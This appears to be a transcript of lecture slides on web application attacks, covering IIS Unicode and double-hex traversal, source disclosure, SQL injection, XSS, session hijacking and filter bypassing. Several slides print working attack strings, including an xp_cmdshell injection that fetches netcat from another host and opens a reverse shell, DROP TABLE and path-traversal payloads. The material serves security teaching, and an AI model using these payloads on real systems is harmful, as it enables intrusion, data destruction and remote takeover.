network security part ii: attacks network security part ii: attacks web attacks
TRANSCRIPT
![Page 1: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/1.jpg)
Network SecurityNetwork SecurityPart II: AttacksPart II: Attacks
Web AttacksWeb Attacks
![Page 2: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/2.jpg)
Overview
• Web Architecture• Web Hack Attacks
![Page 3: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/3.jpg)
Web ArchitectureWeb Architecture
• Web applications are important and this importance is accelerating
• Web applications are complex and this complexity is accelerating
![Page 4: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/4.jpg)
This is Not NewThis is Not New•Problems with web applications are the
same problems with standalone applications
![Page 5: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/5.jpg)
Why Target the WebWhy Target the Web
• Everyone is using it• Safe bet the protocol will not become
obsolete anytime soon• New technology is being implemented/
retrofitted on top (e.g. SOAP, WebDAV)• It’s everywhere! Mobile phones, cars,
watches, toasters…• Protocol fundamentally not suited to do
a majority of what it’s doing today
![Page 6: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/6.jpg)
The Trouble with HTTPThe Trouble with HTTP
• Multitude of involved technologies• The involved protocols are extremely
simple; therefore, it is easy to (mis)code services on your own HTTP server
• Lack of experience coding public service type, multi-user applications
• Stateless nature makes transaction based systems tricky
![Page 7: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/7.jpg)
How Did We Get Here?How Did We Get Here?
• Unskilled/robotic programmers (“code mills”)
• Lack of security-oriented programming training
• Tendency to ‘code now, fix later’• Current tools make it very easy to code
insecurely• Misconceptions about what ‘security’
really involves
![Page 8: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/8.jpg)
Trouble Prone Areas of Trouble Prone Areas of the Webthe Web
• Buffer overflows– Classic bug that’s been exploited for quite a
while– Lack of bounds-checking in the language a
majority of web applications are written in combined with poor programming practice
– Can exist in the web server, application server, database server, or the CGI programs
– Fortunately it’s a well-advertised problem– Many scripting languages (ASP, PHP,
Perl, .NET, etc) are generally immune, as they have auto-expanding elements
![Page 9: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/9.jpg)
Trouble Prone Areas of Trouble Prone Areas of the Webthe Web
• Cross-site scripting– Reprinting user data without filtering it for
web-specific characters– Potential to trick users into executing java
script in vulnerable site’s context– Partly a ‘social engineering’ technique– More of a liability than a vulnerability—it’s a
way to hack the users, not the server
![Page 10: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/10.jpg)
Trouble Prone Areas of Trouble Prone Areas of the Webthe Web
• SQL tampering– Web server already has/allows access to the
database server– Attacker can cause arbitrary SQL to be executed– Results vary from data exposure to full system
compromise– Does not require direct database access!– Many applications are vulnerable– Stems from CGIs/scripts making assumptions
about user input and not double checking/filtering
![Page 11: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/11.jpg)
Trouble Prone Areas of Trouble Prone Areas of the Webthe Web
• File includes– It’s common for a CGI to open and display or
manipulate the contents of a file on the server
– If the filename is composed of user-supplied elements, an attacker may be able to trick the server into opening another file
– Can lead to info disclosure or script or command execution
![Page 12: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/12.jpg)
Trouble Prone Areas of Trouble Prone Areas of the Webthe Web
• Authentication weaknesses– CGIs can fail to check credentials with every
request– Thus you bypass the login script and directly
access the following scripts, without needing username/password
– Or, certain actions/functions may not check for the proper authentication
![Page 13: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/13.jpg)
Trouble Prone Areas of Trouble Prone Areas of the Webthe Web
• Weak session mechanism– The session/state mechanism uses
predictable token IDs– Or, the ID keyspace is too small for the
number of users– Either way, an attacker can ‘guess’ a valid
token and hijack the session
![Page 14: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/14.jpg)
Mid Range E-Commerce Mid Range E-Commerce Roll-OutRoll-Out
• Web Server• Application Server• Database Server• … and a Firewall• Maybe some options…
– Load Balancer– Reverse Proxy servers– Cache systems
![Page 15: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/15.jpg)
Typical Web Application Typical Web Application Set-UpSet-Up
WebServer
DB
DB
Web app
WebClient Web app
Web app
Web app
HTTPrequest
(cleartext or SSL)
HTTP reply(HTML,
Javascript, VBscript,
etc)
Plugins:•Perl•C/C++•JSP, etc
Database connection:•ADO,•ODBC, etc.
SQL Database
•Apache•IIS•Netscape etc…
Firewall
![Page 16: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/16.jpg)
Traditional HackingTraditional Hacking
• Targeted against vulnerabilities in OS components and Network services.– Buffer overflows
• Not portable; attacks specific to operating system architecture, authentication, services, etc.
• Myriad of exploits for different services, OS platforms, CPU architectures, etc.
![Page 17: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/17.jpg)
Traditional HackingTraditional Hacking
• Requires specialized coding skills such as writing shell-code for buffer-overflows, etc.
• In short, it is a complex activity with a limited practitioner base.
...winsock_found:
xor eax, eaxpush eaxinc eaxpush eaxinc eaxpush eaxcall socketcmp eax, -1jnz socket_ok
push sockerrlpush offset sockerrcall write_consolejmp quit2
socket_ok:mov sock, eaxmov sin.sin_family, 2mov esi, offset _port
...
![Page 18: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/18.jpg)
Limitations of Limitations of Traditional Hacking…Traditional Hacking…
• Modern network architectures are getting more robust and secure.
• Firewalls being used in almost all network roll-outs.
• OS vendors learning from past mistakes (?) and coming out with patches rapidly.
• Increased maturity in coding practices.
![Page 19: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/19.jpg)
Utility of FirewallsUtility of Firewalls
WebServer
DB
DB
Web app
Web app
Web app
Web app
SQL Database
Firewall
wu-ftpdSun RPC
NT ipc$XXX
Hacks on OS Hacks on OS network network services services
prevented by prevented by firewallsfirewalls
Limits Traditional hacking
![Page 20: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/20.jpg)
Utility of FirewallsUtility of Firewalls
WebServer
Web app
DB
DB
Web app
Web app
Web app
SQL Database
Firewall
X
Internal back-end application servers are on a non-routable IP network.
(Private Addresses)
![Page 21: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/21.jpg)
Utility of FirewallsUtility of Firewalls
WebServer
Web app
DB
DB
Web app
Web app
Web app
SQL Database
Firewall
XOutbound access
restricted. Why would a web server telnet
out?
![Page 22: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/22.jpg)
Futility of FirewallsFutility of Firewalls
• Web traffic is the most commonly allowed of any of the protocols through enterprise firewalls.
• HTTP is perceived as friendly traffic• Why lay siege to the wall when you have
a open door.• Attacks that based on
Content/Applications applications are still viewed by some as rare.
![Page 23: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/23.jpg)
Tools Required for Web Tools Required for Web HackingHacking
• A web browser• An Internet connection• ….a clear mind and some spare time!
![Page 24: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/24.jpg)
A Classification of Web A Classification of Web HacksHacks
• Web attacks fall under the following general categories:– Buffer overflow attacks– SQL injection attacks– Input validation attacks– URL interpretation attacks– Impersonation attacks
![Page 25: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/25.jpg)
Firewalls Cannot Firewalls Cannot Prevent…Prevent…
WebServer
WebClient
Web server misconfiguration
Firewall
• Complexity Complexity mismanagementmismanagement
• IndifferenceIndifference
![Page 26: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/26.jpg)
Attack the ArchitectureAttack the Architecture
Java Runtime
WebServer
htmlhandler
html
jsp
text/htmlheader
/bin/sh
includefile
shtml
text/htmlheader
ProcessSSI tags
#exec#include
script/execu--table
ProcessJSP tags
JavaCompiler
class
shtmlhandler
jsphandler
defaulthandler
cgihandler
text/htmlheader
cgish,perl,…
??
![Page 27: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/27.jpg)
Web Server Architecture Web Server Architecture AttacksAttacks
• Complex web server architectures are can lead to implementation vulnerabilities.
• A common attack is to bypass the web server configuration directives, and invoke the built-in procedures directly.
• A close look at the web server architecture can reveal security problems.
![Page 28: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/28.jpg)
Architecture Architecture MisconfigurationsMisconfigurations
• Handler Forcing:– Certain mis-configurations allow handlers to
be forced onto files that are not supposed to be processed by them.
– Forcing a default handler onto a CGI file can cause the contents of the CGI file to be returned “as-is”.
• Forcing a JSP handler onto an HTML file can cause the contents of the HTML file to be compiled by the Java compiler and executed by the Java run-time machine
![Page 29: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/29.jpg)
JSP Handler ForcingJSP Handler Forcing
WebServer
ProcessJSP tags
JavaCompiler
class
jsphandler
htmlhandler
htmltext/htmlheader
JSP PageCompile
handler forced on to html files
Java Runtime
![Page 30: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/30.jpg)
Firewalls Cannot Firewalls Cannot Prevent…Prevent…
WebServer
WebClient
Poor checking of user inputs
Web app
Web app
Web app
Web app
URLInterpretation attacks
Firewall
• Input validation attacks
![Page 31: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/31.jpg)
URL Interpretation URL Interpretation AttacksAttacks
• Several well known vulnerabilities in Windows NT and Internet Information Services dating from Autumn 2000, have been wrapped into a common definition: "The Unicode Bug."
• URL Parsing vulnerability.• Improper handling of illegal Unicode sequences.• Allows remote users to execute arbitrary
commands on the web server under the context of IUSR.
• Can lead to potential Administrator level access.
![Page 32: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/32.jpg)
The IIS Unicode BugThe IIS Unicode Bug
• Exploit:http://10.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
– attacker could view a directory listing of a server's C:\ drive
• %c0%af = “/”• Can use HTTP POST to send
multiple commands at a time to cmd.exe.
![Page 33: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/33.jpg)
Web Hacking for Collateral Web Hacking for Collateral DamageDamage
• Web hacking can result in three types of collateral damage.
1. Information disclosure (paths etc.)• Arbitrary file content and source code leakage
2. Data disclosure (i.e. return all rows)3. Arbitrary command execution
![Page 34: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/34.jpg)
Source Code DisclosureSource Code Disclosure
"Use the Source, Luke!“
• WebLogic / WebSphere “JSP” bug1. • Ability to retrieve source code of
JSP/JHTML files.• Using uppercase “JSP” in the URL causes
the server to return unparsed JSP code.
1. Discovered by Shreeraj Shah, Foundstone.
![Page 35: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/35.jpg)
A Classic Case of “Handler A Classic Case of “Handler Mismatch." Mismatch."
Java Runtime
index.jspProcessJSP tags
JavaCompiler
jsphandler
defaulthandler
index.JSP = index.jsp
htmlhandler
shtmlhandler
jhtmlhandler
weblogic.httpd.register.file=weblogic.servlet.FileServlet
weblogic.httpd.register.*.shtml=weblogic.servlet.ServerSideIncludeServlet
weblogic.httpd.register.*.jhtml=weblogic.servlet.jhtmlc.PageCompileServlet
weblogic.httpd.register.*.jsp=weblogic.servlet.JSPServlet
HTTP Request:index.JSP
Web
Logi
c S
erve
r
XX
![Page 36: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/36.jpg)
More Source DisclosureMore Source Disclosure
• URL prefixes for source code disclosure1:/servlet/file/ (IBM WebSphere)/file/ (BEA WebLogic)/*.shtml/ (BEA WebLogic)/ConsoleHelp/ (BEA WebLogic)/servlet/com.sun.server.http.servlet.FileServlet/
(Sun JavaWebServer)
1 Advisories located on: http://www.foundstone.com/advisories.htm
![Page 37: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/37.jpg)
……I Thought it was I Thought it was FunctionalityFunctionality
• IIS “+.htr” bug.– View source code of ASP/ASA files.– URL interpretation vulnerability.
http://10.0.0.1/global.asa+.htr
– “.htr” causes ISM.DLL to handle the URL.– Characters after the “+” sign (space) are
ignored.
![Page 38: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/38.jpg)
Doom on You….Doom on You….
<SCRIPT LANGUAGE="VBScript" RUNAT="Server">Sub Application_OnStart Set Db = Server.CreateObject("Commerce.DbServer") Db.ConnectionString = "DSN=trans.db;UID=sa;PWD=n0t4u2c" Db.Application = "http://10.1.1.16/" Set Application("Db") = DbEnd SubSub Session_OnStart '==Visual InterDev Generated - DataConnection startspan== '--Project Data Connection Session("DataConn_ConnectionString") = "DSN=CertSrv;DBQ=C:\WINNT2\System32\CertLog\certsrv.mdb;DriverId=25; FIL=MS Access;MaxBufferSize=512;PageTimeout=5;" Session("DataConn_ConnectionTimeout") = 15 Session("DataConn_CommandTimeout") = 30 Session("DataConn_RuntimeUserName") = "" Session("DataConn_RuntimePassword") = "" '==Visual InterDev Generated - DataConnection endspan==End Sub</SCRIPT>
User ID: sa
Password: n0t4u2c
![Page 39: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/39.jpg)
More Source DisclosureMore Source Disclosure
• Some applications access files without appropriate checking.
• Input validation vulnerability.• No checking performed for file type or
location.• Filenames can be manipulated via
parameters passed on the URL or as hidden fields.
![Page 40: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/40.jpg)
NT IIS Showcode ASP NT IIS Showcode ASP VulnerabilityVulnerability
• Active Server Page (ASP) script installed by default on Microsoft's Internet Information Server (IIS) 4.0
• Gives remote users access to view any file on the same volume as the web server that is readable by the web server.
http://www.someserver.com/msadc/Samples/SELECTOR/Showcode
asp?source=/msadc/Samples/../../../../../boot.ini
![Page 41: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/41.jpg)
Firewalls Cannot Firewalls Cannot Prevent…Prevent…
WebServer
DB
DB
Web app
WebClient Web app
Web app
Web app
HTTPrequest
(cleartext or SSL)
Input validation attacks
Extend SQL statements
SQL Database
URL Interpretation attacks
Firewall
• SQL Query Poisoning
![Page 42: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/42.jpg)
SQL Query PoisoningSQL Query Poisoning
• Poor input validation on parameters passed to SQL queries can be disastrous.
• Return all rows:http://10.0.0.3/showtable.asp?ID=3+OR+1=1
• Resultant query:SELECT * FROM PRODUCT WHERE ID=3 OR 1=1
![Page 43: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/43.jpg)
SQL Query PoisoningSQL Query Poisoning
• Drop Table:http://10.0.0.3/showtable.asp?ID=3%01DROP+TABLE+PRODUCT
• Resultant query:SELECT * FROM PRODUCT WHERE ID=3 DROP TABLE PRODUCT
![Page 44: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/44.jpg)
SQL Query PoisoningSQL Query Poisoning
• Remote Command Execution!http://10.0.0.3/showtable.asp? ID=3%01EXEC+master..xp_cmdshell+
‘tftp+-i+10.0.0.13+GET+nc.exe+
%26%26+nc+-e+cmd.exe+10.0.0.11+2000’
• Command executed:tftp -i 10.0.0.13 GET nc.exe &&
nc -e cmd.exe 10.0.0.11 2000
![Page 45: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/45.jpg)
SQL Remote CommandoSQL Remote Commando
IIS
DBASP
tftpserver
nc.exe
WebBrowser
C:\>_
1
23
listener at port 2001 to receive the connection
tftp server to get nc.exe transferred over to the NT IIS box.
SELECT * FROM PRODUCT WHERE ID=3EXEC master..xp_cmdshell tftp -i 10.0.0.13 GET nc.exe && nc -e cmd.exe 10.0.0.11 2000
![Page 46: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/46.jpg)
Firewalls Cannot Firewalls Cannot Prevent…Prevent…
WebServer
DB
DB
Web app
WebClient Web app
Web app
Web app
Reverse engineering HTTP
cookies
Input validation attacks
SQL query poisoning
SQL Database
URL Interpretation attacks
Firewall
HTTP session hijacking
•Impersonation
![Page 47: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/47.jpg)
Firewalls Cannot Firewalls Cannot Prevent…Prevent…
WebServer
DB
DB
Web app
WebClient Web app
Web app
Web app
HTTPrequest
(cleartext or SSL)
HTTP reply(HTML,
Javascript, VBscript,
etc)
Plugins:•Perl•C/C++•JSP, etc
Database connection:•ADO,•ODBC, etc.
SQL Database
•Apache•IIS•Netscape etc…
Firewall
•Application bugs
![Page 48: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/48.jpg)
The MDAC AttackThe MDAC Attack• Vulnerability with Microsoft Data Access
Components (msadcs.dll).• MDAC allows remote users to perform
SQL queries without authentication.• Only the DSN needs to be known.• SQL queries can be crafted to execute
arbitrary commands.
![Page 49: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/49.jpg)
The MDAC AttackThe MDAC AttackClient Server
Internet Explorer
or VB.exe
RDS Data
Control
OBDC Provider
RDS Data
Space
Custom Business Objects
RDS
Data Factory
ASP
(ADO)
Jet Provider Jet
3.5
OBDC
Remote Data Service
URL
HTML
OLE
DB
IIS
Server
msadcs.dll
![Page 50: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/50.jpg)
The MDAC AttackThe MDAC Attack
• Exploit:
$query="Select * from Customerswhere City='|shell(\"$command\")|'";
$dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" .$p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";}
• Gain Administrator Privileges on NT!
![Page 51: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/51.jpg)
The MDAC Attack in The MDAC Attack in ActionAction
IIS 4.0
DBmsadcs
dll
tftpserver
nc.exe
mdac.pl(exploit)
C:\>_
1
23
listener at port 2001 to receive the connection
tftp server to get nc.exe transferred over to the NT IIS box.
SELECT * FROM Customers WHERECity = “|shell($command)
![Page 52: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/52.jpg)
The Effectiveness of Web The Effectiveness of Web HackingHacking
• By default ports 80 and 443 are usually allowed through firewalls. The open door…
• A single URL string is able to be processed by many different components.
• In most cases the only defense is reliance on secure coding.
![Page 53: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/53.jpg)
Missile of DeathMissile of Death
WebServer
DB
DB
Web app
Web app
Web app
Web app
http: // 10.0.0.1 / catalog / display.asp ? pg = 1 & product = 7
![Page 54: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/54.jpg)
Cross Site Scripting, Cross Site Scripting, Why You Should Care.Why You Should Care.
•XSS is not an attack on the server, it is an attack on the users of your application
•So what?– Identity theft– User masquerading – Reputation Risk
![Page 55: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/55.jpg)
Cross Site Scripting Cross Site Scripting (XSS)(XSS)
•Found in 98% of applications•2 main types
– Transient (URL basedPhttp://badapp.com/error.jsp?msg=<SCRIPT>alert("Test");</SCRIPT>
– Sticky – Script placed in a static bit of web content
![Page 56: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/56.jpg)
XSS continued…XSS continued…
•Transient generally requires user interaction
•What can happen?– Possibilities are only restricted by the client– Cookie theft most common example
•But I filter “<“ and “>”– Jscript entities “&{alert(‘Test')};”
![Page 57: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/57.jpg)
Session HijackingSession Hijacking
•HTTP is stateless so application designers must build a way to track state
•Cookies and URL strings are the most common ways to track state
•Both are easily exploitable
![Page 58: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/58.jpg)
Session Hijacking Session Hijacking Continued…Continued…
•Generally the next thing to occur after XSS
•Examples of common session tracking issues
![Page 59: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/59.jpg)
Parameter TamperingParameter Tampering
•Programmers will store data anywhere!– URL parameters
http://badapp.com/checkout.pl?p=$1.00– Cookies – Cookie:p=$1.00– Hidden fields – not really hidden
![Page 60: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/60.jpg)
Unbound File CallsUnbound File Calls
•Ye Ole’ ../../•Becomes an issue with the display
important information (global.asa)•Most application languages will take
URL’s as file arguments
![Page 61: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/61.jpg)
Do You Know Where Do You Know Where Your Data is?Your Data is?
•Building an exclusionary filter is difficult because your data is all over the place
![Page 62: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/62.jpg)
Data Flow ExampleData Flow Example
Internet
Customer Service
Database
Marketing Database
Database
Orders Database
www.hackme.com
![Page 63: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/63.jpg)
Designing a proper Designing a proper filterfilter
•Make all filters default deny– Don’t try to exclude “bad stuff”
•Requires a good idea where your data is going
•Log all filter violations
![Page 64: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/64.jpg)
Filter Bypassing is a Filter Bypassing is a Technique to Evade Technique to Evade
Detection by Filtering Detection by Filtering Systems.Systems. • Filter Bypassing techniques come in many varieties
when applied to the many facets of web application security.
• The general idea of performing the various techniques described is to successfully bypass security measures designed to prevent certain types/amounts/values of data from being passed into a given system.
• Many of the described techniques can be highly effective when used properly and even become more powerful when used in combination.
![Page 65: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/65.jpg)
Most filter systems are Most filter systems are very simplevery simple
Seven forms of ingenuity:• URL Encoded Strings• Double Hex Encoding• Unicode Encoded String• Long URLs• Case Sensitivity• XSS Filter-Bypass Manipulation• Null Character Injection
![Page 66: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/66.jpg)
The Hex AdvantageThe Hex Advantage
By URL hex encoding URL strings, it may be possiblecircumvent filter security systems and IDS.
http://foo.com/cgi?file=/etc/passwd
Can become:
http://foo.com/cgi?file=/%2F%65%74%63
%2F%70%61%73%73%77%64
![Page 67: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/67.jpg)
Double Hex EncodingDouble Hex Encoding
• In September 2001, the Nimda worm spread throughout the Internet taking advantage of a Microsoft IIS vulnerability.
• The vulnerability was called an Escaped Character Decoding Vulnerability, which involves double hex encoding of a URL.
• An attacker or automated script would craft a URL so that it contained special hex-encoded sequences to exploit a vulnerability.
• When an un-patched, vulnerable Microsoft IIS server received the encoded URL, one round of hex decoding was performed on the path in the URL.
• IIS then performed a security check on the decoded URL, but afterwards performed a second round of hex decoding.
• This secondary decoding was the source of another Vulnerability.
![Page 68: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/68.jpg)
IIS Double HexIIS Double Hex
Round 1 Decoding:scripts/..%255c../winntbecomes:scripts/..%5c../winnt(%25 = “%” Character)
Round 2 Decoding:scripts/..%5c../winntbecomes:scripts/..\../winnt
Directory path traversal is now possible using path obfuscation through Double
Hex Encoding.
![Page 69: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/69.jpg)
The Unicode SlashThe Unicode Slash• In unicode, “%c0%af”, is the equivilent to a
slash (“/”). • Therefore the common URL IIS exploit:
scripts/..%c0%af../winnt
• becomes: scripts/../../winnt
Once again, directory path traversal is now possible using path obfuscation
through Unicode.
![Page 70: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/70.jpg)
Double SlashDouble Slash
•Double Slash using multiple directory slashes in URLs. For example: http://www.foo.com/..//etc//passwd.
•Can be used to move under the radar of IDS systems and still function properly.
